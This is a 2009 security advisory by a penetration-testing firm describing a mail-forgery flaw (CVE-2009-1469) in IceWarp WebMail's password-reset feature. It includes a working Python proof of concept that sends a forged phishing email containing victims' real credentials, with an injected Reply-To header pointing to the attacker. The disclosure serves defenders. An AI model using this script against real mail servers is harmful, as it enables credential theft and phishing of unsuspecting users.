IceWarp WebMail Mail Forgery

`Advisory: IceWarp WebMail Server: Client-Side Specification of "Forgot  
Password" eMail Content  
  
  
During a penetration test, RedTeam Pentesting discovered that the emails  
sent by the IceWarp WebMail Server when using the "Forgot Password"  
function are generated on the client side. Furthermore, the server  
expands certain keywords in these emails to users' full names, usernames  
and passwords. This allows for advanced social engineering attacks and  
the potential disclosure of usernames and passwords.  
  
Details  
=======  
  
Product: IceWarp eMail Server / WebMail Server  
Affected Versions: 9.4.1  
Fixed Versions: 9.4.2  
Vulnerability Type: Unauthorised System Message Manipulation  
Security Risk: medium  
Vendor URL: http://www.icewarp.com/  
Vendor Status: notified, fixed version released  
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2009-004  
Advisory Status: published  
CVE: CVE-2009-1469  
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1469  
  
  
Introduction  
============  
  
"Feature complete yet easy to use, WebMail Server Pro provides feature  
rich Web 2.0 web-based access to email, calendars, contacts, files and  
shared data from any computer with browser and internet connection,  
without the usual configuration hassle. Thanks to advanced technologies  
and application-like look and feel, Pro suggests it was born to become  
the ultimate replacement of Outlook and similar desktop mail clients."  
  
(from the vendor's homepage)  
  
  
More Details  
============  
  
The IceWarp WebMail Server implements a "Forgot Password" function on  
the login page. Users who have forgotten their login password can  
provide their email address to the mail server. It will then check if  
the email address exists in the system and send the associated user's  
password to it.  
  
The HTTP POST request sent when clicking on the "Forgot Password" page's  
submit button has a payload similar to the following:  
  
------------------------------------------------------------------------  
<iq type="set">  
<query xmlns="webmail:iq:auth">  
<forgot>[email protected]</forgot>  
<captcha uid="5861146275903694001237908440543">Z2JK 3WWY</captcha>  
<subject>Your password for %EMAIL%</subject>  
<message>  
Dear %FULLNAME%,  
your login data for webmail are following:  
  
Username: %USERNAME%  
Password: %PASSWORD%  
  
This email was sent to: %EMAIL%, %ALTEMAIL%.  
</message>  
</query>  
</iq>  
------------------------------------------------------------------------  
  
The message content of the email is specified with the HTTP POST request  
and not on the server side. It is therefore possible to manipulate the  
content of the message.  
  
The variables between the percent ("%") character are substituted by the  
system with data from the database. The following variables are  
recognised:  
  
%FULLNAME% Fullname of the user (first name, last name)  
%USERNAME%, %USER% User name  
%PASSWORD% Password of the user's account  
%EMAIL% Email address  
%ALTEMAIL% Alternative email address  
%REMOTEIP% Remote IP address of the server  
  
By injecting newlines into the subject of the message, it is also  
possible to add additional headers to the email. These are however not  
parsed by the mail system and will only appear in the web frontend as  
headers of the real mail. An example would be to add an additional  
"To:", "Cc:" or "Bcc:" header.  
  
  
  
Proof of Concept  
================  
  
The following proof of concept code sends an email with a request to  
reply to the email to renew the account. The injected "Reply-To" header  
will make the reply go the attacker's email address. The variables in  
the body will be expanded to the real username and password of the  
account. If the users leave the original content of the mail intact when  
replying, the attacker will get the login credentials.  
  
-------------------------------------------------------------------------  
#! /usr/bin/env python  
import urllib2, sys  
  
conf = {  
"captcha_uid": "5989688782215156001239966846169",  
"captcha": "4SJZ Z4GY",  
"forgot": "[email protected]",  
"replyto": "[email protected]",  
"server": "http://www.example.com/webmail/server/webmail.php"  
}  
  
data = """  
<iq type="set">  
<query xmlns="webmail:iq:auth">  
<forgot>%(forgot)s</forgot>  
<captcha uid="%(captcha_uid)s">%(captcha)s</captcha>  
<subject>  
<![CDATA[  
Account expiration %EMAIL%\r\nReply-To: %(replyto)s\n  
]]>  
</subject>  
<message>  
Dear %FULLNAME%,  
  
your account  
  
Username: %USERNAME%  
Password: %PASSWORD%  
  
has expired. To renew the account, please reply to this email  
leaving the email body intact, so we know the account is still  
used.  
  
Kind regards,  
  
the IT department  
</message>  
</query>  
</iq>  
""" % conf  
  
req = urllib2.Request(conf['server'])  
req.add_data(data)  
res = urllib2.urlopen(req)  
print repr(res.read())  
-------------------------------------------------------------------------  
  
  
Workaround  
==========  
  
Do not trust emails even if they contain your valid password. Always  
check the address an email is sent to when replying. Preferably, do not  
include your login credentials in unencrypted emails.  
  
  
Fix  
===  
  
Upgrade to version 9.4.2.  
  
  
Security Risk  
=============  
  
Client-side specification of the email message text, combined with the  
availability of these variables, make elaborate social engineering  
attacks possible. Attackers can send emails to users of the email system  
and fake knowledge of users' full names, usernames and passwords, adding  
credibility. This makes it more likely for users to comply with any  
requests made in the email. The risk is therefore regarded as medium.  
  
  
  
History  
=======  
  
2009-03-23 Vulnerabilities identified during a penetration test  
2009-04-01 Meeting with customer and vendor  
2009-04-28 CVE number assigned  
2009-05-05 Vendor publishes fixed version  
2009-05-05 Advisory released  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting is offering individual penetration tests, short  
pentests, performed by a team of specialised IT-security experts.  
Hereby, security weaknesses in company networks or products are  
uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at  
http://www.redteam-pentesting.de.  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 963-1300  
Dennewartstr. 25-27 Fax : +49 241 963-1304  
52068 Aachen http://www.redteam-pentesting.de/  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck  
`